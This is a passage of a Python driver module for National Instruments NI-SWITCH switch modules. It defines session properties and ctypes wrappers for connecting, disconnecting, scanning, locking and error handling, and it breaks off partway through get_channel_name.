This property specifies what happens to existing connections that conflict with the connections you make in a scan list. For example, if CH1 is already connected to CH2 and the scan list instructs the switch device to connect CH1 to CH3, this property specifies what happens to the connection between CH1 and CH2.
If the value of this property is ScanMode.NONE, the switch device takes no action on existing paths. If the value is ScanMode.BREAK_BEFORE_MAKE, the switch device breaks conflicting paths before making new ones. If the value is ScanMode.BREAK_AFTER_MAKE, the switch device breaks conflicting paths after making new ones.
Most switch devices support only one of the possible values. In such cases, this property serves as an indicator of the device's behavior.
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
'''
serial_number = _attributes.AttributeViString(1150015)
'''Type: str
This read-only property returns the serial number for the switch device controlled by this instrument driver. If the device does not return a serial number, the driver returns the IVI_ERROR_ATTRIBUTE_NOT_SUPPORTED error.
'''
settling_time = _attributes.AttributeViReal64TimeDeltaSeconds(1250004)
'''Type: float in seconds or datetime.timedelta
This channel-based property returns the maximum length of time from after you make a connection until the signal flowing through the channel settles. The units are seconds.
the greater value of the settling time and the value you specify as the scan delay.
Note: NI PXI-2501/2503/2565/2590/2591 Users--the actual delay will always be
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
session.channels[0,1].settling_time = var
var = session.channels[0,1].settling_time
'''
simulate = _attributes.AttributeViBoolean(1050005)
'''Type: bool
Specifies whether or not to simulate instrument driver I/O operations. If simulation is enabled, instrument driver methods perform range checking and call Ivi_GetAttribute and Ivi_SetAttribute methods, but they do not perform instrument I/O. For output parameters that represent instrument data, the instrument driver methods return calculated values.
The default value is False. Use the InitWithOptions method to override this value.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
specific_driver_description = _attributes.AttributeViString(1050514)
'''Type: str
A string that contains a brief description of the specific driver.
'''
specific_driver_revision = _attributes.AttributeViString(1050551)
'''Type: str
A string that contains additional version information about this instrument driver.
'''
specific_driver_vendor = _attributes.AttributeViString(1050513)
'''Type: str
A string that contains the name of the vendor that supplies this driver.
'''
supported_instrument_models = _attributes.AttributeViString(1050327)
'''Type: str
Contains a comma-separated list of supported instrument models.
'''
temperature = _attributes.AttributeViReal64(1150019)
'''Type: float
This property returns the temperature as read by the Switch module. The units are degrees Celsius.
'''
trigger_input = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.TriggerInput, 1250022)
'''Type: enums.TriggerInput
This property specifies the source of the trigger for which the switch device can wait when processing a scan list. The switch device waits for a trigger when it encounters a semi-colon in a scan list. When the trigger occurs, the switch device advances to the next entry in the scan list.
'''
trigger_input_polarity = _attributes.AttributeEnum(_attributes.AttributeViInt32, enums.TriggerInputPolarity, 1150010)
'''Type: enums.TriggerInputPolarity
Determines the behavior of the trigger Input.
'''
wire_mode = _attributes.AttributeViInt32(1250017)
'''Type: int
This property returns the wire mode of the switch device.
This property affects the values of the num_of_rows and num_of_columns properties. The actual number of input and output lines on the switch device is fixed, but the number of channels depends on how many lines constitute each channel.
Tip:
This property can use repeated capabilities (channels). If set or get directly on the
niswitch.Session object, then the set/get will use all repeated capabilities in the session.
You can specify a subset of repeated capabilities using the Python index notation on an
niswitch.Session repeated capabilities container, and calling set/get value on the result.:
var = session.channels[0,1].wire_mode
'''
def __init__(self, repeated_capability_list, vi, library, encoding, freeze_it=False):
    """Wrap an open driver session, scoped to the given repeated capabilities."""
    self._repeated_capability_list = repeated_capability_list
    self._repeated_capability = ','.join(repeated_capability_list)
    self._vi = vi
    self._library = library
    self._encoding = encoding
    # Capture the constructor arguments so __repr__ can echo the call later.
    arg_reprs = [
        "repeated_capability_list=" + pp.pformat(repeated_capability_list),
        "vi=" + pp.pformat(vi),
        "library=" + pp.pformat(library),
        "encoding=" + pp.pformat(encoding),
    ]
    self._param_list = ', '.join(arg_reprs)
    # Set last: once frozen, __setattr__ rejects any brand-new attribute names.
    self._is_frozen = freeze_it
def __repr__(self):
return '{0}.{1}({2})'.format('niswitch', self.__class__.__name__, self._param_list)
def __setattr__(self, key, value):
if self._is_frozen and key not in dir(self):
raise AttributeError("'{0}' object has no attribute '{1}'".format(type(self).__name__, key))
object.__setattr__(self, key, value)
def _get_error_description(self, error_code):
    '''_get_error_description
    Return a human-readable description for error_code, best-effort.
    Prefers the session's queued error string; falls back to translating
    the code itself, and finally to a fixed failure message.
    '''
    try:
        _, error_string = self._get_error()
        return error_string
    except errors.Error:
        pass
    # _get_error is expected to raise when the session is invalid (the IVI
    # spec requires GetError to fail there). _error_message does not need a
    # valid session, so translate the raw code instead.
    try:
        return self._error_message(error_code)
    except errors.Error:
        return "Failed to retrieve error description."
''' These are code-generated '''
@ivi_synchronized
def _get_attribute_vi_boolean(self, attribute_id):
    r'''_get_attribute_vi_boolean
    Query the value of a ViBoolean property (instrument-specific or
    inherent IVI). If the property represents an instrument state, this
    method performs instrument I/O when state caching is disabled for the
    session or the property, or when the cached value is invalid.
    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object it uses all repeated capabilities in the session; use
    Python index notation on a repeated capabilities container to select a subset:
    session.channels[0,1]._get_attribute_vi_boolean(attribute_id)
    Args:
    attribute_id (int): ID of the property to query.
    Returns:
    attribute_value (bool): The current value of the property.
    '''
    session_handle = _visatype.ViSession(self._vi)  # case S110
    channel_buffer = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding))  # case C010
    attr_id = _visatype.ViAttr(attribute_id)  # case S150
    out_value = _visatype.ViBoolean()  # case S220
    error_code = self._library.niSwitch_GetAttributeViBoolean(session_handle, channel_buffer, attr_id, ctypes.pointer(out_value))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return bool(out_value.value)
@ivi_synchronized
def _get_attribute_vi_int32(self, attribute_id):
    r'''_get_attribute_vi_int32
    Query the value of a ViInt32 property (instrument-specific or
    inherent IVI). If the property represents an instrument state, this
    method performs instrument I/O when state caching is disabled for the
    session or the property, or when the cached value is invalid.
    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object it uses all repeated capabilities in the session; use
    Python index notation on a repeated capabilities container to select a subset:
    session.channels[0,1]._get_attribute_vi_int32(attribute_id)
    Args:
    attribute_id (int): ID of the property to query.
    Returns:
    attribute_value (int): The current value of the property.
    '''
    session_handle = _visatype.ViSession(self._vi)  # case S110
    channel_buffer = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding))  # case C010
    attr_id = _visatype.ViAttr(attribute_id)  # case S150
    out_value = _visatype.ViInt32()  # case S220
    error_code = self._library.niSwitch_GetAttributeViInt32(session_handle, channel_buffer, attr_id, ctypes.pointer(out_value))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return int(out_value.value)
@ivi_synchronized
def _get_attribute_vi_real64(self, attribute_id):
    r'''_get_attribute_vi_real64
    Query the value of a ViReal64 property (instrument-specific or
    inherent IVI). If the property represents an instrument state, this
    method performs instrument I/O when state caching is disabled for the
    session or the property, or when the cached value is invalid.
    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object it uses all repeated capabilities in the session; use
    Python index notation on a repeated capabilities container to select a subset:
    session.channels[0,1]._get_attribute_vi_real64(attribute_id)
    Args:
    attribute_id (int): ID of the property to query.
    Returns:
    attribute_value (float): The current value of the property.
    '''
    session_handle = _visatype.ViSession(self._vi)  # case S110
    channel_buffer = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding))  # case C010
    attr_id = _visatype.ViAttr(attribute_id)  # case S150
    out_value = _visatype.ViReal64()  # case S220
    error_code = self._library.niSwitch_GetAttributeViReal64(session_handle, channel_buffer, attr_id, ctypes.pointer(out_value))
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return float(out_value.value)
@ivi_synchronized
def _get_attribute_vi_string(self, attribute_id):
    r'''_get_attribute_vi_string
    Query the value of a ViString property (instrument-specific or
    inherent IVI). If the property represents an instrument state, this
    method performs instrument I/O when state caching is disabled for the
    session or the property, or when the cached value is invalid.

    The underlying C API uses the IVI variable-size-string protocol: when
    called with array size 0 and a NULL buffer, it returns (as a positive
    status code) the buffer size required to hold the whole value including
    the terminating NUL byte. This wrapper makes that size-query call first,
    allocates the buffer, then calls again to fetch the value.
    Tip:
    This method requires repeated capabilities (channels). If called directly on the
    niswitch.Session object, then the method will use all repeated capabilities in the session.
    You can specify a subset of repeated capabilities using the Python index notation on an
    niswitch.Session repeated capabilities container, and calling this method on the result.:
    session.channels[0,1]._get_attribute_vi_string(attribute_id)
    Args:
    attribute_id (int): ID of the property to query.
    Returns:
    attribute_value (str): The current value of the property, decoded with
    the session encoding.
    '''
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    channel_name_ctype = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding))  # case C010
    attribute_id_ctype = _visatype.ViAttr(attribute_id)  # case S150
    array_size_ctype = _visatype.ViInt32()  # case S170 -- 0: ask for the required size only
    attribute_value_ctype = None  # case C050 -- NULL buffer on the size-query call
    error_code = self._library.niSwitch_GetAttributeViString(vi_ctype, channel_name_ctype, attribute_id_ctype, array_size_ctype, attribute_value_ctype)
    # Warnings ignored here: a positive error_code is the required buffer size.
    errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
    array_size_ctype = _visatype.ViInt32(error_code)  # case S180 -- reuse returned size
    attribute_value_ctype = (_visatype.ViChar * array_size_ctype.value)()  # case C060
    error_code = self._library.niSwitch_GetAttributeViString(vi_ctype, channel_name_ctype, attribute_id_ctype, array_size_ctype, attribute_value_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return attribute_value_ctype.value.decode(self._encoding)
def _get_error(self):
    r'''_get_error
    Retrieve and then clear the IVI error information for the session (or,
    per the IVI spec, for the current execution thread when the handle is
    VI_NULL). Normally describes the first error since the last call to
    _get_error or ClearError. An invalid session makes the C call itself
    fail with an error.

    Uses the IVI variable-size-string protocol: the first call passes buffer
    size 0 and a NULL buffer (which also leaves the error info un-cleared),
    and its positive return value is the buffer size needed for the full
    description; the second call fetches and clears it.
    Note:
    One or more of the referenced methods are not in the Python API for this driver.
    Returns:
    code (int): The error code for the session or execution thread.
    description (str): The error description, decoded with the session
    encoding; empty string when there is no description.
    '''
    vi_ctype = _visatype.ViSession(self._vi)  # case S110
    code_ctype = _visatype.ViStatus()  # case S220
    buffer_size_ctype = _visatype.ViInt32()  # case S170 -- 0: size-query call
    description_ctype = None  # case C050 -- NULL buffer on the size-query call
    error_code = self._library.niSwitch_GetError(vi_ctype, None if code_ctype is None else (ctypes.pointer(code_ctype)), buffer_size_ctype, description_ctype)
    # Warnings ignored: a positive error_code is the required buffer size.
    errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=True)
    buffer_size_ctype = _visatype.ViInt32(error_code)  # case S180 -- reuse returned size
    description_ctype = (_visatype.ViChar * buffer_size_ctype.value)()  # case C060
    error_code = self._library.niSwitch_GetError(vi_ctype, None if code_ctype is None else (ctypes.pointer(code_ctype)), buffer_size_ctype, description_ctype)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
    return int(code_ctype.value), description_ctype.value.decode(self._encoding)
def lock(self):
    '''lock
    Obtain a multithread lock on the device session, waiting first for all
    other execution threads to release their locks on it.

    Other threads may hold a lock because the application called lock, or
    because a call into NI-SWITCH locked the session. After lock returns
    successfully, no other thread can access the device session until you
    call unlock (or exit the with-block when using lock as a context
    manager). Wrap a sequence of driver calls in lock/unlock if the device
    must retain its settings through the whole sequence.

    Nested calls to lock from the same thread are safe; balance every lock
    call with an unlock call to fully release the session.
    Returns:
    lock (context manager): When used in a with statement, niswitch.Session.lock acts as
    a context manager and unlock will be called when the with block is exited
    '''
    # Lock here (not inside the context manager) so lock() also works
    # standalone with an explicit unlock(); the with-block handles the
    # unlock only when the context manager is actually used.
    self._lock_session()
    return _Lock(self)
def _lock_session(self):
    '''_lock_session
    Actual call to driver
    '''
    handle = _visatype.ViSession(self._vi)  # case S110
    status = self._library.niSwitch_LockSession(handle, None)
    errors.handle_error(self, status, ignore_warnings=False, is_error_handling=True)
@ivi_synchronized
def _set_attribute_vi_boolean(self, attribute_id, attribute_value):
    r'''_set_attribute_vi_boolean
    Set the value of a ViBoolean property. This is a low-level method for
    setting instrument-specific and inherent IVI properties. If the
    property represents an instrument state, instrument I/O occurs when
    state caching is disabled for the session or the property, or when the
    cached value is invalid or differs from the value you specify.

    Prefer the high-level driver methods where possible: they handle order
    dependencies and multithread locking, check instrument status only
    after setting all properties (SetAttribute calls check status after
    each call), and with state caching enabled perform I/O only for values
    that actually change.
    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object it uses all repeated capabilities in the session; use
    Python index notation on a repeated capabilities container to select a subset:
    session.channels[0,1]._set_attribute_vi_boolean(attribute_id, attribute_value)
    Args:
    attribute_id (int): ID of the property to set.
    attribute_value (bool): The value to assign to the property. Some values
    may be invalid depending on the current settings of the instrument
    session. Default Value: none
    '''
    session_handle = _visatype.ViSession(self._vi)  # case S110
    channel_buffer = ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding))  # case C010
    attr_id = _visatype.ViAttr(attribute_id)  # case S150
    new_value = _visatype.ViBoolean(attribute_value)  # case S150
    error_code = self._library.niSwitch_SetAttributeViBoolean(session_handle, channel_buffer, attr_id, new_value)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def _set_attribute_vi_int32(self, attribute_id, attribute_value):
    r'''_set_attribute_vi_int32

    Low-level setter for a ViInt32 property. Prefer the high-level driver
    methods where possible: they handle ordering dependencies and
    multithread locking, check status once after setting everything, and
    (with state caching enabled) skip instrument I/O for unchanged values.
    This method performs instrument I/O whenever state caching is disabled
    for the session/property, or the cached value is invalid or differs
    from the requested value.

    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object, it applies to all repeated capabilities in the session.
    Select a subset with Python index notation on the repeated capabilities
    container and call the method on the result:
    session.channels[0,1]._set_attribute_vi_int32(attribute_id, attribute_value)

    Args:
        attribute_id (int): ID of the property to set.

        attribute_value (int): Value to assign to the property.
    '''
    # Marshal every argument up front, then issue a single driver call.
    arguments = (
        _visatype.ViSession(self._vi),
        ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)),
        _visatype.ViAttr(attribute_id),
        _visatype.ViInt32(attribute_value),
    )
    error_code = self._library.niSwitch_SetAttributeViInt32(*arguments)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def _set_attribute_vi_real64(self, attribute_id, attribute_value):
    r'''_set_attribute_vi_real64

    Low-level setter for a ViReal64 property. Prefer the high-level driver
    methods where possible: they handle ordering dependencies and
    multithread locking, check status once after setting everything, and
    (with state caching enabled) skip instrument I/O for unchanged values.
    This method performs instrument I/O whenever state caching is disabled
    for the session/property, or the cached value is invalid or differs
    from the requested value.

    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object, it applies to all repeated capabilities in the session.
    Select a subset with Python index notation on the repeated capabilities
    container and call the method on the result:
    session.channels[0,1]._set_attribute_vi_real64(attribute_id, attribute_value)

    Args:
        attribute_id (int): ID of the property to set.

        attribute_value (float): Value to assign to the property.
    '''
    # Marshal every argument up front, then issue a single driver call.
    arguments = (
        _visatype.ViSession(self._vi),
        ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)),
        _visatype.ViAttr(attribute_id),
        _visatype.ViReal64(attribute_value),
    )
    error_code = self._library.niSwitch_SetAttributeViReal64(*arguments)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def _set_attribute_vi_string(self, attribute_id, attribute_value):
    r'''_set_attribute_vi_string

    Low-level setter for a ViString property. Prefer the high-level driver
    methods where possible: they handle ordering dependencies and
    multithread locking, check status once after setting everything, and
    (with state caching enabled) skip instrument I/O for unchanged values.
    This method performs instrument I/O whenever state caching is disabled
    for the session/property, or the cached value is invalid or differs
    from the requested value.

    Tip:
    This method requires repeated capabilities (channels). Called directly on the
    niswitch.Session object, it applies to all repeated capabilities in the session.
    Select a subset with Python index notation on the repeated capabilities
    container and call the method on the result:
    session.channels[0,1]._set_attribute_vi_string(attribute_id, attribute_value)

    Args:
        attribute_id (int): ID of the property to set.

        attribute_value (str): Value to assign to the property.
    '''
    # Marshal every argument up front, then issue a single driver call.
    # Both channel name and value are encoded with the session's encoding.
    arguments = (
        _visatype.ViSession(self._vi),
        ctypes.create_string_buffer(self._repeated_capability.encode(self._encoding)),
        _visatype.ViAttr(attribute_id),
        ctypes.create_string_buffer(attribute_value.encode(self._encoding)),
    )
    error_code = self._library.niSwitch_SetAttributeViString(*arguments)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
def unlock(self):
    '''unlock

    Releases a lock previously acquired on the device session with
    lock. See lock for details on session locking.
    '''
    session_handle = _visatype.ViSession(self._vi)
    # Second parameter (caller-has-lock out-pointer) is unused here.
    error_code = self._library.niSwitch_UnlockSession(session_handle, None)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
def _error_message(self, error_code):
    r'''_error_message

    Converts an NI-SWITCH status code into a user-readable string.
    Use for a static lookup of an error code description.

    Args:
        error_code (int): Status code returned by any NI-SWITCH method.
            Default Value: 0 (VI_SUCCESS)

    Returns:
        error_message (str): The error information formatted into a string.
    '''
    session_handle = _visatype.ViSession(self._vi)
    status_ctype = _visatype.ViStatus(error_code)
    # The C API requires a caller-supplied buffer of at least 256 bytes.
    message_buffer = (_visatype.ViChar * 256)()
    error_code = self._library.niSwitch_error_message(session_handle, status_ctype, message_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=True)
    return message_buffer.value.decode(self._encoding)
class Session(_SessionBase):
'''An NI-SWITCH session to a National Instruments Switch Module'''
def __init__(self, resource_name, topology="Configured Topology", simulate=False, reset_device=False):
    r'''An NI-SWITCH session to a National Instruments Switch Module.

    Returns a session handle used to identify the switch in all subsequent
    instrument driver calls and sets the topology of the switch.
    __init__ creates a new IVI instrument driver session for the switch
    specified in the resource_name parameter. The driver uses the topology
    specified in the topology parameter and overrides the topology
    specified in MAX.

    Note: When initializing an NI SwitchBlock device with topology, you
    must specify the topology created when you configured the device in
    MAX, using either NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY or the
    topology string of the device. Refer to the "Initializing with
    Topology for NI SwitchBlock Devices" topic in the NI Switches Help for
    information about determining the topology string of an NI SwitchBlock
    device.

    By default, the switch is reset to a known state. Enable simulation by
    specifying the topology and setting the simulate parameter to True.

    Args:
        resource_name (str): Resource name of the switch module to
            initialize. Examples: 'SC1Mod3' (NI-DAQmx module in chassis
            "SC1" slot 3), 'MySwitch' (renamed NI-DAQmx module),
            'SCXI1::3' (Traditional NI-DAQ module, chassis 1 slot 3),
            'PXI0::16' (PXI bus 0, device 16). IVI logical names are also
            valid. Default values for optional fields: chassis ID = 1,
            bus number = 0.

        topology (str): Topology name to use for the switch, or
            NISWITCH_TOPOLOGY_CONFIGURED_TOPOLOGY (the default) to use the
            last topology configured for the device in MAX. Refer to the
            NI Switches Help for the full list of valid
            NISWITCH_TOPOLOGY_* strings for each device family.

        simulate (bool): Enables simulation of the switch module specified
            in resource_name. Default: False (don't simulate).

        reset_device (bool): Whether to reset the switch module during
            initialization. True (default) resets the device; False is
            currently unsupported.

    Returns:
        session (niswitch.Session): A session object representing the device.
    '''
    super(Session, self).__init__(repeated_capability_list=[], vi=None, library=None, encoding=None, freeze_it=False)
    self._library = _library_singleton.get()
    # NI driver strings (resource names, error messages) are Windows
    # Latin-1. 'windows-1251' (Cyrillic) was a typo and would mis-decode
    # any non-ASCII byte round-tripped through the C API.
    self._encoding = 'windows-1252'
    # Call specified init function
    self._vi = 0  # This must be set before calling _init_with_topology().
    self._vi = self._init_with_topology(resource_name, topology, simulate, reset_device)
    # Instantiate any repeated capability objects
    self.channels = _RepeatedCapabilities(self, '')
    # Store the parameter list for later printing in __repr__
    param_list = [
        "resource_name=" + pp.pformat(resource_name),
        "topology=" + pp.pformat(topology),
        "simulate=" + pp.pformat(simulate),
        "reset_device=" + pp.pformat(reset_device),
    ]
    self._param_list = ', '.join(param_list)
    self._is_frozen = True
def __enter__(self):
    # Context-manager entry: the session itself is the managed resource.
    return self
def __exit__(self, exc_type, exc_value, traceback):
    # Context-manager exit: always close the driver session; exceptions
    # (if any) propagate because nothing truthy is returned.
    self.close()
def initiate(self):
    '''initiate

    Commits the configured scan list and trigger settings to hardware and
    initiates the scan. If niSwitch Commit was called earlier, niSwitch
    Initiate Scan only initiates the scan and returns immediately. Once the
    scanning operation begins, you cannot perform any other operation other
    than GetAttribute, AbortScan, or SendSoftwareTrigger. All other
    methods return NISWITCH_ERROR_SCAN_IN_PROGRESS. To stop the
    scanning operation, call abort.

    Note:
    This method will return a Python context manager that will initiate on entering and abort on exit.
    '''
    return _Scan(self)
def close(self):
    '''close

    Terminates the NI-SWITCH session and all of its properties and
    deallocates any memory resources the driver uses. Notes: (1) You must
    unlock the session before calling _close. (2) After calling
    _close, you cannot use the instrument driver again until you
    call init or InitWithOptions.

    Note:
    One or more of the referenced methods are not in the Python API for this driver.

    Note:
    This method is not needed when using the session context manager
    '''
    try:
        self._close()
    except errors.DriverError:
        # Even when the driver-level close fails, invalidate the handle
        # before re-raising so later calls do not reuse a dead session.
        self._vi = 0
        raise
    self._vi = 0
''' These are code-generated '''
@ivi_synchronized
def abort(self):
    r'''abort

    Aborts the scan in progress. Start a scan with initiate. If the switch
    module is not scanning, NISWITCH_ERROR_NO_SCAN_IN_PROGRESS is returned.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_AbortScan(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def can_connect(self, channel1, channel2):
    r'''can_connect

    Verifies that a path between channel 1 and channel 2 can be created.
    If a path is possible in the switch module, the availability of that
    path is returned given the existing connections. If the path is
    possible but in use, a NISWITCH_WARN_IMPLICIT_CONNECTION_EXISTS
    warning is returned.

    Args:
        channel1 (str): One channel name of the desired path; pass the
            other as channel2. Refer to Devices Overview for valid channel
            names for the switch module. Examples: ch0, com0, ab0, r1, c2,
            cjtemp. Default value: ""

        channel2 (str): One channel name of the desired path; pass the
            other as channel1. Same naming rules as channel1.
            Default value: ""

    Returns:
        path_capability (enums.PathCapability): Whether the path is valid:
            PATH_AVAILABLE (1) - the driver can create the path now;
            PATH_EXISTS (2) - the path already exists;
            PATH_UNSUPPORTED (3) - the instrument cannot create a path
            between these channels;
            NISWITCH_VAL_RSRC_IN_USE (4) - the path is valid but required
            channels are busy creating another path (destroy it first);
            SOURCE_CONFLICT (5) - both channels are connected to different
            source channels;
            CHANNEL_NOT_AVAILABLE (6) - one of the channels is a
            configuration channel, unavailable for external connections.

    Note:
    One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
    '''
    session_handle = _visatype.ViSession(self._vi)
    channel1_buffer = ctypes.create_string_buffer(channel1.encode(self._encoding))
    channel2_buffer = ctypes.create_string_buffer(channel2.encode(self._encoding))
    # Out-parameter the driver fills with a PathCapability value.
    path_capability_out = _visatype.ViInt32()
    error_code = self._library.niSwitch_CanConnect(
        session_handle, channel1_buffer, channel2_buffer, ctypes.pointer(path_capability_out)
    )
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
    return enums.PathCapability(path_capability_out.value)
@ivi_synchronized
def commit(self):
    r'''commit

    Downloads the configured scan list and trigger settings to hardware.
    Calling commit is optional, as it is implicitly called during
    initiate. Use commit to arm triggers in a given order or to control
    when expensive hardware operations are performed.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_Commit(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def connect(self, channel1, channel2):
    r'''connect

    Creates a path between channel 1 and channel 2. The driver calculates
    and uses the shortest path between the two channels. Paths are
    bidirectional: if a path exists between CH1 and CH2, it also exists
    between CH2 and CH1.

    If a path is not available, the method returns one of:
    - NISWITCH_ERROR_EXPLICIT_CONNECTION_EXISTS, if the two channels are
      already explicitly connected via connect or set_path.
    - NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL, if a channel is a
      configuration channel (error elaboration identifies which one).
    - NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES, if both channels are
      connected to different sources.
    - NISWITCH_ERROR_CANNOT_CONNECT_TO_ITSELF, if both parameters name
      the same channel.
    - NISWITCH_ERROR_PATH_NOT_FOUND, if no path exists between them.

    Args:
        channel1 (str): One endpoint of the desired path. Refer to Devices
            Overview for valid channel names (e.g. ch0, com0, ab0, r1, c2,
            cjtemp). Default value: None
        channel2 (str): The other endpoint of the desired path. Same naming
            rules as channel1. Default value: None
    '''
    session_handle = _visatype.ViSession(self._vi)
    ch1_buffer = ctypes.create_string_buffer(channel1.encode(self._encoding))
    ch2_buffer = ctypes.create_string_buffer(channel2.encode(self._encoding))
    error_code = self._library.niSwitch_Connect(session_handle, ch1_buffer, ch2_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def connect_multiple(self, connection_list):
    r'''connect_multiple

    Creates the connections between channels specified in the connection
    list. Specify connections with two endpoints only, or with the explicit
    path between two endpoints; NI-SWITCH calculates and uses the shortest
    path between the channels. In the event of an error, connecting stops
    at the point in the list where the error occurred.

    Possible errors when a path is unavailable:
    - NISWITCH_ERROR_EXPLICIT_CONNECTION_EXISTS — channels already
      explicitly connected.
    - NISWITCH_ERROR_IS_CONFIGURATION_CHANNEL — a channel is a
      configuration channel.
    - NISWITCH_ERROR_ATTEMPT_TO_CONNECT_SOURCES — both channels connect to
      different sources.
    - NISWITCH_ERROR_CANNOT_CONNECT_TO_ITSELF — both endpoints are the
      same channel.
    - NISWITCH_ERROR_PATH_NOT_FOUND — no path between the two channels.

    Paths are bidirectional.

    Args:
        connection_list (str): List of connections between channels to
            make. NI-SWITCH validates the list and aborts execution if
            errors are returned. Refer to Connection and Disconnection List
            Syntax for valid syntax. Example: c0 -> r1, [c2 -> r2 -> c3]
            (here r2 is a configuration channel). Default value: None
    '''
    session_handle = _visatype.ViSession(self._vi)
    list_buffer = ctypes.create_string_buffer(connection_list.encode(self._encoding))
    error_code = self._library.niSwitch_ConnectMultiple(session_handle, list_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def disable(self):
    r'''disable

    Places the switch module in a quiescent state where it has minimal or
    no impact on the system to which it is connected. All channels are
    disconnected and any scan in progress is aborted.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_Disable(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def disconnect(self, channel1, channel2):
    r'''disconnect

    Destroys the path between two channels created with the connect or
    set_path method. If a path is not connected or not available, the
    method returns the IVISWTCH_ERROR_NO_SUCH_PATH error.

    Args:
        channel1 (str): One endpoint of the path to break. Refer to Devices
            Overview for valid channel names (e.g. ch0, com0, ab0, r1, c2,
            cjtemp). Default value: None
        channel2 (str): The other endpoint of the path to break. Same
            naming rules as channel1. Default value: None
    '''
    session_handle = _visatype.ViSession(self._vi)
    ch1_buffer = ctypes.create_string_buffer(channel1.encode(self._encoding))
    ch2_buffer = ctypes.create_string_buffer(channel2.encode(self._encoding))
    error_code = self._library.niSwitch_Disconnect(session_handle, ch1_buffer, ch2_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def disconnect_all(self):
    r'''disconnect_all

    Breaks all existing paths. If the switch module cannot break all paths,
    the NISWITCH_WARN_PATH_REMAINS warning is returned.
    '''
    session_handle = _visatype.ViSession(self._vi)
    error_code = self._library.niSwitch_DisconnectAll(session_handle)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def disconnect_multiple(self, disconnection_list):
    r'''disconnect_multiple

    Breaks the connections between channels specified in the disconnection
    list. If no connections exist between channels, NI-SWITCH returns an
    error. In the event of an error, execution stops at the point in the
    list where the error occurred.

    Args:
        disconnection_list (str): List of connections between channels to
            break. NI-SWITCH validates the list and aborts execution if
            errors are returned. Refer to Connection and Disconnection List
            Syntax for valid syntax. Example: c0 -> r1, [c2 -> r2 -> c3]
            (here r2 is a configuration channel). Default value: None
    '''
    session_handle = _visatype.ViSession(self._vi)
    list_buffer = ctypes.create_string_buffer(disconnection_list.encode(self._encoding))
    error_code = self._library.niSwitch_DisconnectMultiple(session_handle, list_buffer)
    errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
@ivi_synchronized
def get_channel_name(self, index):
    r'''get_channel_name

    Returns the channel string that is in the channel table at the
    specified index. Use get_channel_name in a loop to get a complete list
    of valid channel names for the switch module; use the Channel Count
    property to determine the number of channels.

    Args:
        index (int): A 1-based index into the channel table. Default
            value: 1. Maximum value: value of Channel Count property.

    Returns:
        channel_name_buffer (str): The channel name at the given index.
    '''
    session_handle = _visatype.ViSession(self._vi)
    index_arg = _visatype.ViInt32(index)
    # Sizing call: with a zero buffer size the return code carries the
    # required buffer length, so warnings are ignored here.
    size_arg = _visatype.ViInt32()
    error_code = self._library.niSwitch_GetChannelName(session_handle, index_arg, size_arg, None)
    errors.handle_error(self, error_code, ignore_warnings=True, is_error_handling=False)
    # Fetch call: allocate the reported size and retrieve the name.
    size_arg = _visatype.ViInt32(error_code)
    name_buffer = (_visatype.ViChar * size_arg.value)()
